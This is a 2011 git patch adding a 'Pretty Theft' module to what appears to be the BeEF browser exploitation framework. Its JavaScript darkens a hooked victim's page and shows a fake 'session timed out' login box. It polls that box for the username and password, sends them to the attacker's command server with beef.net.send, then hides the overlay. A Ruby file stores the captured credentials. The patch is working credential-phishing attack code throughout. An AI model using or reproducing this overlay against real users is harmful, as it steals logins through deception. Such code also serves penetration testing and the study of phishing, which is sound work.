From 02d25cc82b1a98474f7fafdc7df6f268bb11c9ed Mon Sep 17 00:00:00 2001 From: Christian Frichot Date: Thu, 24 Nov 2011 21:23:43 +0800 Subject: [PATCH] (Fixes issue 561): Pretty Theft module added (and tidied up a bit, can now run multiple times, and enter key submits form) --- modules/misc/pretty_theft/command.js | 117 ++++++++++++++++++++++++++ modules/misc/pretty_theft/config.yaml | 25 ++++++ modules/misc/pretty_theft/module.rb | 35 ++++++++ 3 files changed, 177 insertions(+) create mode 100644 modules/misc/pretty_theft/command.js create mode 100644 modules/misc/pretty_theft/config.yaml create mode 100644 modules/misc/pretty_theft/module.rb diff --git a/modules/misc/pretty_theft/command.js b/modules/misc/pretty_theft/command.js new file mode 100644 index 000000000..9e06ee561 --- /dev/null +++ b/modules/misc/pretty_theft/command.js @@ -0,0 +1,117 @@ +// +// Copyright 2011 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + imgr = "<%== @imgsauce %>"; + var answer= ''; + // set up darkening + function grayOut(vis, options) { + // Pass true to gray out screen, false to ungray + // options are optional. This is a JSON object with the following (optional) properties + // opacity:0-100 // Lower number = less grayout higher = more of a blackout + // zindex: # // HTML elements with a higher zindex appear on top of the gray out + // bgcolor: (#xxxxxx) // Standard RGB Hex color code + // grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'}); + // Because options is JSON opacity/zindex/bgcolor are all optional and can appear + // in any order. Pass only the properties you need to set. + var options = options || {}; + var zindex = options.zindex || 50; + var opacity = options.opacity || 70; + var opaque = (opacity / 100); + var bgcolor = options.bgcolor || '#000000'; + var dark=document.getElementById('darkenScreenObject'); + if (!dark) { + // The dark layer doesn't exist, it's never been created. So we'll + // create it here and apply some basic styles. + // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917 + var tbody = document.getElementsByTagName("body")[0]; + var tnode = document.createElement('div'); // Create the layer. + tnode.style.position='absolute'; // Position absolutely + tnode.style.top='0px'; // In the top + tnode.style.left='0px'; // Left corner of the page + tnode.style.overflow='hidden'; // Try to avoid making scroll bars + tnode.style.display='none'; // Start out Hidden + tnode.id='darkenScreenObject'; // Name it so we can find it later + tbody.appendChild(tnode); // Add it to the web page + dark=document.getElementById('darkenScreenObject'); // Get the object. + } + if (vis) { + // Calculate the page width and height + if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) { + var pageWidth = document.body.scrollWidth+'px'; + var pageHeight = document.body.scrollHeight+'px'; + } else if( document.body.offsetWidth ) { + var pageWidth = document.body.offsetWidth+'px'; + var pageHeight = document.body.offsetHeight+'px'; + } else { + var pageWidth='100%'; + var pageHeight='100%'; + } + //set the shader to cover the entire page and make it visible. + dark.style.opacity=opaque; + dark.style.MozOpacity=opaque; + dark.style.filter='alpha(opacity='+opacity+')'; + dark.style.zIndex=zindex; + dark.style.backgroundColor=bgcolor; + dark.style.width= pageWidth; + dark.style.height= pageHeight; + dark.style.display='block'; + } else { + dark.style.display='none'; + } + } + + // function to send response + function win(){ + document.getElementById('hax').innerHtml='

Thank you for re-authenticating, you will now be returned to the application

'; + answer = document.getElementById('uname').value+':'+document.getElementById('pass').value; + } + + // perform darkening + grayOut(true); + + function checker(){ + processval = document.body.lastChild.getElementsByTagName("input")[2].value; + if (processval == "Processing..") { + uname = document.body.lastChild.getElementsByTagName("input")[0].value; + pass = document.body.lastChild.getElementsByTagName("input")[1].value; + answer = uname+":"+pass + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer); + // set lastchild invisible + document.body.lastChild.setAttribute('style','display:none'); + // lighten screen + grayOut(false); + clearInterval(credgrabber); + } + } + + + // floating div + function writeit() { + sneakydiv = document.createElement('div'); + sneakydiv.setAttribute('id', 'hax'); + sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000'); + sneakydiv.setAttribute('align', 'center'); + document.body.appendChild(sneakydiv); + sneakydiv.innerHTML= '

Your session has timed out!

For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.

Username:
Password:

'; + credgrabber = setInterval(checker,1000); + + } + + writeit(); + + +}); diff --git a/modules/misc/pretty_theft/config.yaml b/modules/misc/pretty_theft/config.yaml new file mode 100644 index 000000000..ae8f0f078 --- /dev/null +++ b/modules/misc/pretty_theft/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + pretty_theft: + enable: true + category: "Misc" + name: "Pretty Theft" + description: "Asks the user for their username and password using a tidy floating div." + authors: ["vt [nick.freeman@security-assessment.com]"] + target: + user_notify: ['ALL'] diff --git a/modules/misc/pretty_theft/module.rb b/modules/misc/pretty_theft/module.rb new file mode 100644 index 000000000..de6441b3b --- /dev/null +++ b/modules/misc/pretty_theft/module.rb @@ -0,0 +1,35 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Pretty_theft < BeEF::Core::Command + + def self.options + return [ + {'name' =>'imgsauce', 'description' =>'Custom Logo', 'ui_label'=>'Custom Logo', 'value' => 'http://beefproject.com/images/logo.png'} + ] + end + + # + # This method is being called when a zombie sends some + # data back to the framework. + # + def post_execute + +# return if @datastore['answer']=='' + + save({'answer' => @datastore['answer']}) + end + +end